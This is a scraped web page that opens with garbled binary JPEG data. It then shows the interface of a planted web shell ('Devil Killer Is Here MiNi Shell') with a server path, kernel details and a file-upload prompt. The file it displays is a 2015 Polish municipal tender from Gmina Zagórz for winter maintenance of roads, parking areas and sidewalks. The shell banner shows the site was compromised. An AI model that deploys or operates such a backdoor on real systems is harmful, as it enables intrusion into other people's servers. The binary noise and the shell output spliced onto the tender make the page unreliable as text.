JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151021/279812-N-2015.html

<p class="kh_header"><b>Zagórz: Zimowe utrzymanie ulic, dróg, parkingów i chodników 
w sezonie zimowym 2015/2016 i 2016/2017 na terenie miasta i gminy Zagórz</b><br>
<b>Numer ogłoszenia: 279812 - 2015; data zamieszczenia: 21.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zagórz , ul. 3 Maja 2, 38-540 Zagórz, woj. podkarpackie, tel. 013 4622062, faks 013 4622062.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zagorz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie ulic, dróg, parkingów i chodników 
w sezonie zimowym 2015/2016 i 2016/2017 na terenie miasta i gminy Zagórz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi związane z zimowym utrzymaniem ulic, dróg, parkingów               i chodników na terenie miasta i gminy Zagórz w sezonie zimowym 2015/2016 i 2016/2017. Dopuszcza się składanie ofert częściowych, tj. dotyczących określonych rejonów odśnieżania (nr rejon oznacza nr części) - liczba zadań 10.
Zadanie (rejon) nr 1 - 	obejmuje zimowe utrzymanie ulic, dróg, parkingów i chodników na terenie miasta    
                                  	Zagórz. W skład zadania wchodzą osiedla: Nowy Zagórz, ODJ, Stary Zagórz, 
  			Zasław, Pod Klasztorem-Skowronówka, Leska Góra-Żabnik i Wielopole. 

Zadanie (rejon) nr 2 - 	obejmuje zimowe utrzymanie ulic i parkingów na terenie Osiedla Dolina w Zagórzu.
                         
Zadanie (rejon) nr 3 - 	obejmuje zimowe utrzymanie dróg, parkingów i chodnika na terenie miejscowości 
  			Poraż.                          

Zadanie (rejon) nr 4 - 	obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Morochów              
 			i Mokre.
                                                    
Zadanie (rejon) nr 5 - 	obejmuje zimowe utrzymanie dróg, parkingów i chodnika na terenie miejscowości                    
 			Zahutyń.

Zadanie (rejon) nr 6 - 	obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Łukowe.                 
                                
                          
Zadanie (rejon) nr 7 - 	obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Średnie
 			Wielkie i Kalnica.

Zadanie (rejon) nr 8 - obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Tarnawa
                                      	Dolna.
                          
Zadanie (rejon) nr 9 - obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Tarnawa
Górna.

Zadanie (rejon) nr 10 - obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Czaszyn. 

Zadanie (rejon) nr 11 - obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Olchowa.                          
Przedmiot zamówienia obejmuje również zwalczanie śliskości materiałami uszorstniającymi (mieszanką solno-piaskową), które Wykonawca zapewnia we własnym zakresie. 

Szczegółowy zakres usług określony został w zestawieniu stanowiącym zał. nr 7 do SIWZ  oraz formularzach cenowych  stanowiących zał. nr 2 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust. 1 pkt.6 ustawy Prawo zamówień publicznych, w wysokości nie przekraczającej 50% wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówień co objęte zamówieniem podstawowym.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest spełniać warunki wymienione w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (t.j. Dz. U. z 2013 r., poz. 907 z późn. zm.). Spełnianie powyższych warunków będzie oceniane na podstawie złożenia wymaganego w SIWZ i ogłoszeniu o zamówieniu oświadczenia o spełnianiu warunków udziału w postępowaniu. Złożenie oświadczenia zgodnie z wymaganiami SIWZ oraz ogłoszeniu o zamówieniu, będzie potwierdzeniem spełniania wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest spełniać warunki wymienione w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (t.j. Dz. U. z 2013 r., poz. 907 z późn. zm.). Spełnianie powyższych warunków będzie oceniane na podstawie złożenia wymaganego w SIWZ i ogłoszeniu o zamówieniu oświadczenia o spełnianiu warunków udziału w postępowaniu. Złożenie oświadczenia zgodnie z wymaganiami SIWZ oraz ogłoszeniu o zamówieniu, będzie potwierdzeniem spełniania wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jednym opłużonym nośnikiem umożliwiającym realizację zadania. 
Na każdą część wymagany jest odrębny sprzęt, tzn. Wykonawca składający ofertę na więcej niż jedną część musi wykazać odpowiednią ilość sprzętu. Ocena spełnienia warunku udziału                            w postępowaniu zostanie przeprowadzona na podstawie załącznika nr 4 do SIWZ - wykaz sprzętu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest spełniać warunki wymienione w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (t.j. Dz. U. z 2013 r., poz. 907 z późn. zm.). Spełnianie powyższych warunków będzie oceniane na podstawie złożenia wymaganego w SIWZ i ogłoszeniu o zamówieniu oświadczenia o spełnianiu warunków udziału w postępowaniu. Złożenie oświadczenia zgodnie z wymaganiami SIWZ oraz ogłoszeniu o zamówieniu, będzie potwierdzeniem spełniania wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest spełniać warunki wymienione w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (t.j. Dz. U. z 2013 r., poz. 907 z późn. zm.). Spełnianie powyższych warunków będzie oceniane na podstawie złożenia wymaganego w SIWZ i ogłoszeniu o zamówieniu oświadczenia o spełnianiu warunków udziału w postępowaniu. Złożenie oświadczenia zgodnie z wymaganiami SIWZ oraz ogłoszeniu o zamówieniu, będzie potwierdzeniem spełniania wymaganych warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy-zaleca się złożenie formularza wg wzoru stanowiącego załącznik nr 1 do SIWZ,
2. Formularz cenowy-zaleca się złożenie formularza wg wzoru stanowiącego załącznik nr 2 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany i uzupełnienia umowy i załączników dla swej ważności wymagają zachowania formy pisemnej. 2.	Zamawiający przewiduje zmiany wysokości wynagrodzenia należnego Wykonawcy w przypadku zmiany:
a)	stawki podatku od towaru i usług,
b)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, 
c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne 
pod warunkiem wykazania przez Wykonawcę bezpośredniego związku  pomiędzy wymienionymi zmianami, a kosztami poniesionymi przez niego w przypadku wykonania zamówienia będącego przedmiotem niniejszej umowy.
3. W razie zaistnienia zmiany wskazanej w pkt. 2, Wykonawca w terminie 30 dni od daty wejścia w życie dowolnej z powyższych zmian, przedstawi Zamawiającemu w formie pisemnej wniosek o zmianę wynagrodzenia zawierający wyliczenia i dowody (np.: umowy o pracę, umowy o dzieło, umowy zlecenia, itp.), z których będzie wynikać, w jaki sposób zmiany wymienione w pkt 2, wpływają na koszty wykonania przedmiotu umowy przez Wykonawcę i mogą być podstawą do zmiany wartości umowy.
4. Po zaakceptowaniu przez Zamawiającego przedstawionego wniosku strony podpiszą aneks do umowy określający zmianę wynagrodzenia Wykonawcy. Zmiana może obejmować okres od dnia wejścia w życie zmiany o której mowa w pkt 2.
5. Zamawiający przewiduje możliwość  zmian  postanowień  zawartej umowy  w stosunku do treści wybranej oferty, w szczególności w przypadku:
a)  zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
b) zaistnienia okoliczności, niemożliwych do przewidzenia w chwili zawarcia umowy, mających  wpływ na treść zawartej umowy i termin realizacji. 
c) zmiany terminu zakończenia zimowego utrzymania dróg w przypadku wystąpienia niekorzystnych warunków atmosferycznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zagorz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Zagórzu, ul. 3 Maja 2, pok. 31..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2015 godzina 10:00, miejsce: Urząd Miasta i Gminy w Zagórzu, ul. 3 Maja 2, parter, kancelaria ogólna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zimowe utrzymanie ulic, dróg, parkingów i chodników na terenie miasta Zagórz..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (rejon) nr 1 - 	obejmuje zimowe utrzymanie ulic, dróg, parkingów i chodników na terenie miasta    
                                  	Zagórz. W skład zadania wchodzą osiedla: Nowy Zagórz, ODJ, Stary Zagórz, 
  			Zasław, Pod Klasztorem-Skowronówka, Leska Góra-Żabnik i Wielopole.
Przedmiot zamówienia obejmuje również zwalczanie śliskości materiałami uszorstniającymi (mieszanką solno-piaskową), które Wykonawca zapewnia we własnym zakresie. 

Szczegółowy zakres usług określony został w zestawieniu stanowiącym zał. nr 7 do SIWZ  oraz formularzach cenowych  stanowiących zał. nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zimowe utrzymanie ulic i parkingów na terenie Osiedla Dolina w Zagórzu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (rejon) nr 2 - obejmuje zimowe utrzymanie ulic i parkingów na terenie Osiedla Dolina w Zagórzu.
Przedmiot zamówienia obejmuje również zwalczanie śliskości materiałami uszorstniającymi (mieszanką solno-piaskową), które Wykonawca zapewnia we własnym zakresie. 
Szczegółowy zakres usług określony został w zestawieniu stanowiącym zał. nr 7 do SIWZ  oraz formularzach cenowych  stanowiących zał. nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zimowe utrzymanie dróg, parkingów i chodnika na terenie miejscowości 
  			Poraż..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (rejon) nr 3 - 	obejmuje zimowe utrzymanie dróg, parkingów i chodnika na terenie miejscowości 
  			Poraż. 

Przedmiot zamówienia obejmuje również zwalczanie śliskości materiałami uszorstniającymi (mieszanką solno-piaskową), które Wykonawca zapewnia we własnym zakresie. 

Szczegółowy zakres usług określony został w zestawieniu stanowiącym zał. nr 7 do SIWZ  oraz formularzach cenowych  stanowiących zał. nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zimowe utrzymanie dróg i parkingów na terenie miejscowości Morochów              
 			i Mokre..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (rejon) nr 4 - 	obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Morochów              
 			i Mokre.
Przedmiot zamówienia obejmuje również zwalczanie śliskości materiałami uszorstniającymi (mieszanką solno-piaskową), które Wykonawca zapewnia we własnym zakresie. 

Szczegółowy zakres usług określony został w zestawieniu stanowiącym zał. nr 7 do SIWZ  oraz formularzach cenowych  stanowiących zał. nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zimowe utrzymanie dróg, parkingów i chodnika na terenie miejscowości                    
 			Zahutyń..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (rejon) nr 5 - 	obejmuje zimowe utrzymanie dróg, parkingów i chodnika na terenie miejscowości                    
 			Zahutyń.
Przedmiot zamówienia obejmuje również zwalczanie śliskości materiałami uszorstniającymi (mieszanką solno-piaskową), które Wykonawca zapewnia we własnym zakresie. 

Szczegółowy zakres usług określony został w zestawieniu stanowiącym zał. nr 7 do SIWZ  oraz formularzach cenowych  stanowiących zał. nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zimowe utrzymanie dróg i parkingów na terenie miejscowości Łukowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (rejon) nr 6 - 	obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Łukowe.                 
                                 
Przedmiot zamówienia obejmuje również zwalczanie śliskości materiałami uszorstniającymi (mieszanką solno-piaskową), które Wykonawca zapewnia we własnym zakresie. 

Szczegółowy zakres usług określony został w zestawieniu stanowiącym zał. nr 7 do SIWZ  oraz formularzach cenowych  stanowiących zał. nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> zimowe utrzymanie dróg i parkingów na terenie miejscowości Średnie
 			Wielkie i Kalnica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie (rejon) nr 7 - 	obejmuje zimowe utrzymanie dróg i parkingów na terenie miejscowości Średnie
 			Wielkie i Kalnica
Przedmiot zamówienia obejmuje również zwalczanie śliskości materiałami uszorstniającymi (mieszanką solno-piaskową), które Wykonawca zapewnia we własnym zakresie. 

Szczegółowy zakres usług określony został w zestawieniu stanowiącym zał. nr 7 do SIWZ  oraz formularzach cenowych  stanowiących zał. nr 2 do SIWZ..</p></li>
